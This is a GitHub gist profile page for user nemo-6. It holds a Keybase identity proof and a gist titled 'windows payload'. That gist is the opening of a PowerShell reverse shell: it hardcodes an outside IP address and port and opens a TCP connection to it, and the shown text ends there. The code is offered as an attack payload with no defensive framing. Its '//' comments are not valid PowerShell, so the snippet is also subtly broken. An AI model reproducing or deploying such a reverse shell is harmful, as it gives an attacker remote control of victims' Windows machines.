Skip to content

Instantly share code, notes, and snippets.

View nemo-6's full-sized avatar
🍖
people are people

nemosix nemo-6

🍖
people are people
View GitHub Profile
@nemo-6
nemo-6 / keymase.md
Created August 30, 2019 14:17
keybase.md
### Keybase proof
I hereby claim:
* I am nemo-6 on github.
* I am nemo6 (https://keybase.io/nemo6) on keybase.
* I have a public key ASBQqu8w58ir3-lnHgyJELdXmHfLdP3QYfrkh62gyCpzMAo
To claim this, I am signing this object:
@nemo-6
nemo-6 / asd
Created January 31, 2018 21:20
windows payload
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '189.126.128.244'
// Setup PORT
$port = '4445'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)